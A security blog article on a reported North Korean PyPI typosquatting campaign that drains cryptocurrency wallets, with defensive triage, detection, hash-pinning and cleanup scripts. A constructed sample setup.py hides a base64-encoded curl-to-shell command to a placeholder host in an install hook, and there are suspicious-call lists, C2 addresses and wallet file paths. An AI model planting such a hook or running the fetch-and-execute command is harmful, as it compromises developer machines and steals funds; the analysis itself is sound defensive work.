
Introduction
In a sophisticated software supply chain attack, North Korean state-sponsored hackers (Lazarus Group) have infiltrated the Python Package Index (PyPI) with malicious packages designed to drain cryptocurrency wallets. The campaign, active since late 2024, leverages typosquatting and dependency confusion to infect developer environments, ultimately deploying the “CryptoAxe” malware that steals private keys and mnemonic phrases from popular wallets like MetaMask, Atomic Wallet, and Electrum. This attack underscores the critical need for rigorous third-party package verification and real-time monitoring of open-source repositories.
Learning Objectives
- Understand the technical mechanics of PyPI typosquatting and dependency confusion attacks
- Learn to detect and remove malicious packages using Linux/Windows forensic commands
- Implement cryptographic hash verification and sandboxing for Python dependencies
You Should Know
1. Anatomy of the Attack: Typosquatting and Dependency Confusion
The attackers uploaded packages with names like `reqeusts` (a typo of `requests`) and `python-bitcoinlibs` (masquerading as `python-bitcoinlib`). The typosquat needs nothing more than a mistyped `pip install`; the dependency-confusion variant instead registers a public package under the name of an internal one, so that a build whose resolver consults PyPI alongside a private index can pick the public copy. In both cases the package carries a base64-encoded payload that runs from a setup.py install hook, so the code executes during `pip install` itself, before the victim ever imports anything.
Step-by-step analysis of the malicious package (do this only in an isolated VM: `pip download` has to build metadata for a source distribution, and that already executes the module-level code of setup.py):
1. Fetch the source distribution without installing it (Linux):
```bash
# --no-binary forces the sdist so setup.py is present; a wheel carries no install hook
pip download malicious-package-name --no-deps --no-binary :all: --dest /tmp/malware_lab
cd /tmp/malware_lab
tar -xzf malicious-package-name-*.tar.gz
```
2. Inspect setup.py for the install hook (cmdclass is how setuptools registers a custom install step):
```bash
grep -nE "os\.system|subprocess|eval\(|exec\(|b64decode|cmdclass" malicious-package-name-*/setup.py
```
3. Decode the obfuscated payload (example using Python):
```bash
python3 -c "import base64; print(base64.b64decode('cm0gLXJmIC...').decode())"
```
The decoded script typically connects to a C2 server (hxxp://45.9.148[.]231/...) and downloads a second-stage binary (`wallet_drainer.so` on Linux, `wallet_drainer.exe` on Windows).
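The three steps above can be done without ever executing setup.py (which `pip download` of an sdist does in order to read its metadata). The following script is an added example written for this article, not code from the original post or from the campaign's packages: it parses setup.py with Python's `ast` module, lists calls that commonly carry an install hook or its payload, and decodes base64 string literals where they sit. The sample setup.py it analyses is constructed for the example, and `example.invalid` is a placeholder host, not an indicator from the campaign.

```python
"""Static triage of an sdist's setup.py without executing it (added example)."""
import ast
import base64
import binascii
import io
import re
import tarfile

# Callees that typically carry an install-time hook or its payload.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "eval", "exec", "base64.b64decode",
    "urllib.request.urlopen",
}
# Long runs of the base64 alphabet, optionally padded; short literals are ignored to cut noise.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# Constructed sample: a typosquatted "reqeusts" whose install hook runs a base64-hidden shell
# command. The host example.invalid is a placeholder, not an indicator from the campaign.
_PAYLOAD = b"curl -s http://example.invalid/stage2 | sh"
SAMPLE_SETUP_PY = (
    "import os, base64\n"
    "from setuptools import setup\n"
    "from setuptools.command.install import install\n"
    "class PostInstall(install):\n"
    "    def run(self):\n"
    "        install.run(self)\n"
    f"        os.system(base64.b64decode('{base64.b64encode(_PAYLOAD).decode()}').decode())\n"
    "setup(name='reqeusts', version='2.31.0', cmdclass={'install': PostInstall})\n"
)


def _callee_name(call):
    """Dotted name of a Call's callee ('os.system', 'eval'), or None for dynamic callees."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def _decode_if_base64(text):
    """Return the decoded plaintext if `text` is valid base64, else None."""
    if not B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage_setup_py(source):
    """Parse setup.py source; report suspicious calls and decoded base64 literals by line."""
    calls, decoded = [], []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _callee_name(node)
            if name in SUSPICIOUS_CALLS:
                calls.append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            plain = _decode_if_base64(node.value)
            if plain is not None:
                decoded.append((node.lineno, plain))
    return {"calls": sorted(calls), "decoded": sorted(decoded)}


def triage_sdist(source):
    """Triage every setup.py inside a .tar.gz sdist given as a path or file object. Never runs it."""
    opener = {"fileobj": source} if hasattr(source, "read") else {"name": source}
    results = {}
    with tarfile.open(mode="r:gz", **opener) as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("setup.py"):
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                results[member.name] = triage_setup_py(text)
    return results


def build_sample_sdist():
    """Pack SAMPLE_SETUP_PY into an in-memory .tar.gz laid out like a real sdist (constructed)."""
    buf = io.BytesIO()
    data = SAMPLE_SETUP_PY.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("reqeusts-2.31.0/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def triage_sample_sdist():
    """Convenience wrapper: triage the constructed sdist."""
    return triage_sdist(io.BytesIO(build_sample_sdist()))


if __name__ == "__main__":
    for member, report in triage_sample_sdist().items():
        print(member)
        for lineno, name in report["calls"]:
            print(f"  line {lineno}: call to {name}")
        for lineno, plain in report["decoded"]:
            print(f"  line {lineno}: base64 decodes to {plain!r}")
```

Run it against a real download with `triage_sdist("/tmp/malware_lab/<name>.tar.gz")`. Static parsing misses payloads that are assembled at run time (string concatenation, `codecs`, hex), so treat an empty report as "nothing obvious", not as clean.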
2. Detecting Compromised Environments (Linux & Windows)
Linux/macOS – Check for suspicious pip packages:
```bash
# List all installed packages with their installation files
pip list --format=freeze | while read -r pkg; do
    echo "== $pkg =="
    pip show -f "${pkg%%==*}" | sed -n '/^Location/p;/^Requires/p;/^Files:/,$p'
done > /tmp/packages_audit.txt

# Look for recently modified Python files in the user site-packages
# (python -m site prints the real path; it contains the minor version, e.g. python3.12)
find "$(python3 -m site --user-site)" -name "*.py" -mtime -7 -exec ls -la {} \; 2>/dev/null
```
Repeat the same two checks inside every virtualenv and for the system site-packages; a package installed into a project's `.venv` never shows up in the user site.
Windows (PowerShell) – Forensic checks:
```powershell
# Find recently created Python files in the user site-packages
# (python -m site prints the real path, e.g. %APPDATA%\Python\Python312\site-packages)
$userSite = python -m site --user-site
Get-ChildItem -Path $userSite -Include *.py, *.pyc, *.pyd -Recurse |
    Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)} |
    Select-Object FullName, LastWriteTime

# Check for outbound connections by Python processes (requires admin)
$pids = (Get-Process python, pythonw -ErrorAction SilentlyContinue).Id
if ($pids) {
    Get-NetTCPConnection -OwningProcess $pids -State Established -ErrorAction SilentlyContinue |
        Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess
}
```
3. Cryptographic Verification of Packages
Always verify the hash of downloaded packages against official sources. Comparing with the digest PyPI itself publishes catches tampering in transit and a substituted file on a mirror; it does not catch a malicious upload, whose hash is just as "official". Against that you need hashes pinned at the time a version was reviewed, which is what section 5 sets up.
Linux – Verify package integrity with `sha256sum` and `pip hash`:
```bash
# Download package without installing (--only-binary forces the wheel so the filename below matches)
pip download requests==2.31.0 --no-deps --only-binary :all: --dest /tmp/verify
cd /tmp/verify
# Generate SHA256 hash (pip hash prints it in the --hash=sha256:... form used by requirements files)
sha256sum requests-2.31.0-py3-none-any.whl
pip hash requests-2.31.0-py3-none-any.whl
# Compare with the hash PyPI publishes for that file (fetch via JSON API)
curl -s https://pypi.org/pypi/requests/2.31.0/json | jq -r '.urls[] | select(.packagetype=="bdist_wheel") | .digests.sha256'
```
Windows – PowerShell hash comparison:
```powershell
# Download the wheel
pip download requests==2.31.0 --no-deps --only-binary :all: --dest C:\temp\verify
# Compute SHA256 (Get-FileHash prints upper-case hex; PyPI publishes lower-case, so compare case-insensitively)
Get-FileHash C:\temp\verify\requests-2.31.0-py3-none-any.whl -Algorithm SHA256
# Fetch the published hash from PyPI's JSON API
$json = Invoke-RestMethod -Uri "https://pypi.org/pypi/requests/2.31.0/json"
$json.urls | Where-Object {$_.packagetype -eq "bdist_wheel"} |
    Select-Object -ExpandProperty digests | Select-Object sha256
```
4. Network-Level Detection of C2 Communication
The malware attempts to exfiltrate wallet files via HTTPS POST requests. Because the body is TLS-encrypted, the usable signals on the wire are the destination address, the TLS SNI and the preceding DNS lookup, not the payload.
Linux – Monitor live traffic to the known C2 address:
```bash
# Install tcpdump and capture traffic to the C2 host (tcpdump filters by host/port, not by process;
# -A prints little of use for TLS on 443, so also keep a pcap with -w for later analysis)
sudo tcpdump -i any -A -s 0 'tcp port 443 and host 45.9.148.231' &
# Then trigger the malware execution (only inside an isolated sandbox holding no real wallets or credentials)
python -c "import malicious_module"
```
Windows – Use netstat and Process Monitor:
```powershell
# Continuously monitor new connections (netstat -b needs an elevated prompt;
# -Context prints the owning-process line that follows each match)
while ($true) {
    netstat -anob | Select-String "ESTABLISHED" -Context 1,3
    Start-Sleep -Seconds 5
}
```
Look for `python.exe` connecting to suspicious IPs (e.g., 45.9.148.0/24, 103.145.36.0/22).
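The two monitors above print raw connections and leave the matching against the listed ranges to the analyst. The script below is an added example for this article, not code from the original post: it parses `ss -tnp` output, tests every peer address against the ranges quoted in this section with the `ipaddress` module, and records whether a Python interpreter owns the socket. The `ss` lines it runs over are constructed; the only indicators in it are the 45.9.148.0/24 and 103.145.36.0/22 ranges from the text above.

```python
"""Match live TCP peers against C2 ranges and flag Python-owned sockets (added example)."""
import ipaddress
import re
import subprocess

# Ranges quoted in the post; treat them as an input list to maintain, not a complete IOC set.
C2_RANGES = [ipaddress.ip_network(c) for c in ("45.9.148.0/24", "103.145.36.0/22")]

# One `ss -tnp` row: state, queues, local, peer, optional owning process.
SS_ROW = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)"
    r"(?:\s+users:\(\(\"(?P<proc>[^\"]+)\",pid=(?P<pid>\d+),fd=\d+\))?"
)

# Constructed sample of `ss -tnp` output: one Python session to the C2 /24, one browser session to
# an unrelated CDN, one Python session into the /22, and a closing socket with no owner shown.
SAMPLE_SS_OUTPUT = """\
State     Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB     0      0      192.168.1.10:49832   45.9.148.231:443    users:(("python3",pid=4120,fd=5))
ESTAB     0      0      192.168.1.10:49833   151.101.1.63:443    users:(("firefox",pid=2210,fd=77))
ESTAB     0      0      192.168.1.10:49834   103.145.38.7:8443   users:(("python",pid=4121,fd=6))
TIME-WAIT 0      0      192.168.1.10:49835   45.9.148.231:443
"""


def parse_ss(text):
    """Turn `ss -tnp` text into dicts; the header and unparsable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = SS_ROW.match(line.strip())
        if not m:
            continue
        host, port = m.group("peer").rsplit(":", 1)
        rows.append({
            "state": m.group("state"),
            "proc": m.group("proc"),
            "pid": int(m.group("pid")) if m.group("pid") else None,
            "raddr": host.strip("[]"),        # IPv6 peers print as [addr]:port
            "rport": int(port),
        })
    return rows


def flag_connections(rows, ranges=C2_RANGES):
    """Return rows whose peer falls inside a flagged range, annotated with python_owned."""
    hits = []
    for row in rows:
        try:
            ip = ipaddress.ip_address(row["raddr"])
        except ValueError:                     # '*' or hostnames when -n was not used
            continue
        if any(ip in net for net in ranges):
            proc = (row["proc"] or "").lower()
            hits.append({**row, "python_owned": proc.startswith("python")})
    return hits


def flag_live():
    """Run `ss -tnp` on this host (Linux; seeing other users' owning processes needs root)."""
    out = subprocess.run(["ss", "-tnp"], capture_output=True, text=True, check=True).stdout
    return flag_connections(parse_ss(out))


if __name__ == "__main__":
    for hit in flag_connections(parse_ss(SAMPLE_SS_OUTPUT)):
        owner = f"{hit['proc']}[{hit['pid']}]" if hit["proc"] else "unknown owner"
        print(f"{hit['state']:<9} {hit['raddr']}:{hit['rport']} {owner} python_owned={hit['python_owned']}")
```

A hit without an owning process (the TIME-WAIT row in the sample) still matters: the socket closed before you looked, so go back to the pcap or the DNS log for the process that opened it. The matching logic is the same for Windows; only the parser changes if you feed it `Get-NetTCPConnection` output instead of `ss`.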
5. Hardening pip and CI/CD Pipelines
Prevent future attacks by enforcing hash-checking and using private repositories. In hash-checking mode pip refuses to install anything that is not pinned with `==` and at least one `--hash`, transitive dependencies included, so the whole tree has to be pinned; pip-tools' `pip-compile --generate-hashes` produces such a file from a short list of direct dependencies. A private index (or a proxy that serves internal packages plus an allowlist of vetted public ones, configured as the only `--index-url` rather than an `--extra-index-url`) also closes the dependency-confusion path, because an internal name can then never resolve to a public upload.
Configure pip to require hashes (Linux/Windows):
Create `requirements.txt` with hashes:
```text
requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f
```
Install with strict mode:
```bash
pip install --require-hashes -r requirements.txt
```
CI/CD – GitLab CI example with safety check (`safety` matches installed versions against a vulnerability database and `bandit` lints your own source; neither recognises a typosquatted name, so the hash-checked install above remains the gate that actually stops this attack):
```yaml
stages:
  - security

safety-check:
  stage: security
  script:
    - pip install safety bandit
    - safety check --full-report
    - bandit -r src/
  only:
    - main
```
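pip performs the following on your behalf in `--require-hashes` mode; spelling it out makes the checks of sections 3 and 5 concrete. This is an added example, not pip's code or the original post's: it parses hash-pinned requirement lines, renders such a line from the `urls` list of the PyPI JSON API (the same field the curl/jq commands above query), and verifies a downloaded artifact against the pinned digests. The `requests` line is the one given above; the `example-pkg` wheel, its bytes and its JSON entry are constructed for the example.

```python
"""Hash-pinned requirements: parse, generate from the PyPI JSON API, verify artifacts (added example)."""
import hashlib
import re

REQ_LINE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)(?P<rest>.*)$")
HASH_OPT = re.compile(r"--hash=(?P<algo>sha256|sha384|sha512):(?P<digest>[0-9A-Fa-f]+)")


def normalize(name):
    """PEP 503 name normalisation so 'Example_Pkg' and 'example-pkg' pin the same thing."""
    return re.sub(r"[-_.]+", "-", name).lower()


def hash_line_from_pypi(name, version, urls, packagetype="bdist_wheel"):
    """Render 'name==version --hash=sha256:...' from the 'urls' list of
    https://pypi.org/pypi/<name>/<version>/json, one --hash per file of the chosen type."""
    digests = [u["digests"]["sha256"] for u in urls if u["packagetype"] == packagetype]
    if not digests:
        raise ValueError(f"no {packagetype} file published for {name}=={version}")
    return f"{name}=={version} " + " ".join(f"--hash=sha256:{d}" for d in digests)


def parse_requirements(text):
    """Parse a requirements file into {normalized_name: (version, {(algo, digest), ...})}.
    Mirrors pip's --require-hashes rules: every line must be '==' pinned and carry a hash;
    backslash continuations are joined and comments stripped."""
    pins = {}
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"not pinned with '==': {line!r}")
        hashes = {(h.group("algo"), h.group("digest").lower()) for h in HASH_OPT.finditer(m.group("rest"))}
        if not hashes:
            raise ValueError(f"{m.group('name')} has no --hash; --require-hashes would refuse it")
        pins[normalize(m.group("name"))] = (m.group("version"), hashes)
    return pins


def verify_bytes(data, name, pins):
    """True iff `data` matches any pinned digest for `name` (any listed algorithm)."""
    _version, hashes = pins[normalize(name)]
    return any(hashlib.new(algo, data).hexdigest() == digest for algo, digest in hashes)


def verify_file(path, name, pins):
    """Same check for a downloaded wheel or sdist on disk."""
    with open(path, "rb") as fh:
        return verify_bytes(fh.read(), name, pins)


# Constructed sample: a stand-in for example_pkg-1.0-py3-none-any.whl and the JSON entry PyPI
# would publish for it; the requests line is the one given in the post.
SAMPLE_WHEEL_BYTES = b"PK\x03\x04 constructed stand-in for example_pkg-1.0-py3-none-any.whl"
SAMPLE_URLS = [
    {"packagetype": "sdist", "digests": {"sha256": "00" * 32}},
    {"packagetype": "bdist_wheel", "digests": {"sha256": hashlib.sha256(SAMPLE_WHEEL_BYTES).hexdigest()}},
]
SAMPLE_REQUIREMENTS = (
    "requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f\n"
    + hash_line_from_pypi("example-pkg", "1.0", SAMPLE_URLS) + "\n"
)

if __name__ == "__main__":
    pins = parse_requirements(SAMPLE_REQUIREMENTS)
    print("genuine wheel :", verify_bytes(SAMPLE_WHEEL_BYTES, "Example_Pkg", pins))
    print("tampered wheel:", verify_bytes(SAMPLE_WHEEL_BYTES + b"\x00", "Example_Pkg", pins))
```

Two design points carry over to real pipelines: a line without `--hash` is an error, not a warning, because one unpinned requirement is enough to pull in a typosquat; and the pin is taken at review time from the JSON API, so a later re-upload of the same version under a different file hash fails the install instead of silently replacing the reviewed artifact.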
6. Reversing the “CryptoAxe” Dropper
If you have the Linux second stage, start with static analysis of the ELF shared object before anything is executed.
Linux – Static analysis with `strings` and `objdump`:
```bash
# Extract strings and grep for wallet keywords
strings wallet_drainer.so | grep -iE "private key|mnemonic|seed|wallet|address"
# Check imported functions for suspicious APIs (objdump -T lists the dynamic symbol table)
objdump -T wallet_drainer.so | grep -E "socket|connect|send|recv|fork"
```
Windows – Dynamic analysis in sandbox:
Use Process Monitor to watch file system access:
- Filter by `Process Name` = `python.exe`
- Look for file operations (CreateFile/ReadFile as well as writes) on wallet stores: `.dat`, `.wallet`, `seed`, `mnemonic`
Common targets:
```text
%APPDATA%\Electrum\wallets\
%APPDATA%\atomic\Local Storage\leveldb\
%USERPROFILE%\.ethereum\keystore\
```
7. Remediation: Removing the Malware and Recovering Wallets
If compromise is confirmed, take immediate action.
Linux – Remove malicious packages and check for persistence:
```bash
# Uninstall suspicious package
pip uninstall malicious-package-name -y
# Clean cache and site-packages remnants (pip can leave .dist-info or stray modules behind)
pip cache purge
find "$(python3 -m site --user-site)" -maxdepth 1 -iname "malicious*" -exec rm -rf {} +
# Check for cron jobs or systemd timers added by malware (system and per-user)
crontab -l
systemctl list-timers --all | grep -E "python|pip"
systemctl --user list-timers --all | grep -E "python|pip"
```
Windows – Manual cleanup:
```powershell
# Remove package
pip uninstall malicious-package-name -y
# List startup entries that launch Python. Win32_StartupCommand is read-only, so it cannot be
# piped to Remove-Item, and -like needs wildcards or it only matches the exact string "python".
Get-CimInstance Win32_StartupCommand | Where-Object {$_.Command -like "*python*"} |
    Select-Object Name, Command, Location, User
# Delete a confirmed-malicious entry from the per-user Run key (substitute the Name shown above;
# entries whose Location is the Startup folder are deleted as files there instead)
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "<entry-name>"
```
Also review scheduled tasks, which Win32_StartupCommand does not list.
Reset compromised wallets immediately – transfer funds to new wallets generated on a clean machine. A wallet whose seed phrase or private key was read is permanently compromised; restoring the same seed on a clean machine does not help.
What Undercode Say:
- Key Takeaway 1: The Lazarus Group’s PyPI attack proves that developer workstations are prime targets for cryptocurrency theft. Typosquatting remains effective because developers often type fast and ignore warnings.
- Key Takeaway 2: Hash-pinned dependencies and private package mirrors are non-negotiable for organizations handling crypto assets. Blindly trusting PyPI mirrors is an invitation for compromise.
- Key Takeaway 3: Behavioral detection (network connections, file writes) is more reliable than signature-based AV for catching novel supply chain attacks. EDR solutions must monitor Python interpreter activity.
This campaign is a wake-up call: the software supply chain is now the soft underbelly of the crypto economy. Developers must treat every third-party package as potentially malicious until proven otherwise. Sandboxed builds, hash verification, and real-time dependency scanning are the only defenses against this evolving threat.
Prediction:
As open-source repositories become more fortified, Lazarus and similar groups will pivot to compromising maintainer accounts directly via phishing and session hijacking, launching “watering hole” attacks on popular libraries. Expect a surge in malicious npm and RubyGems packages targeting CI/CD secrets, and an increase in AI-generated fake documentation sites hosting poisoned code examples. The line between state-sponsored cybercrime and cyber-espionage will blur further, with stolen crypto funds directly financing weapons programs.
Reported By: Robdance The – Hackers Feeds


